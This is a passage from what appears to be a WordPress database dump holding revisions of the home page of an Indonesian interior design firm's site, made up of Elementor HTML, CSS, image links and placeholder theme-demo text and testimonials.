src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 08:49:19','2023-09-22 08:49:19','',22,'https://bauhaus.futuremediatrix.com/?p=4866',0,'revision','',0),(4867,3,'2023-09-22 08:49:19','2023-09-22 08:49:19','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>WELCOME TO BAUHAUS</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 08:49:19','2023-09-22 08:49:19','',22,'https://bauhaus.futuremediatrix.com/?p=4867',0,'revision','',0),(4868,3,'2023-09-22 08:50:34','2023-09-22 08:50:34','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>WELCOME TO BAUHAUS</p><p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.</p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.</p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n			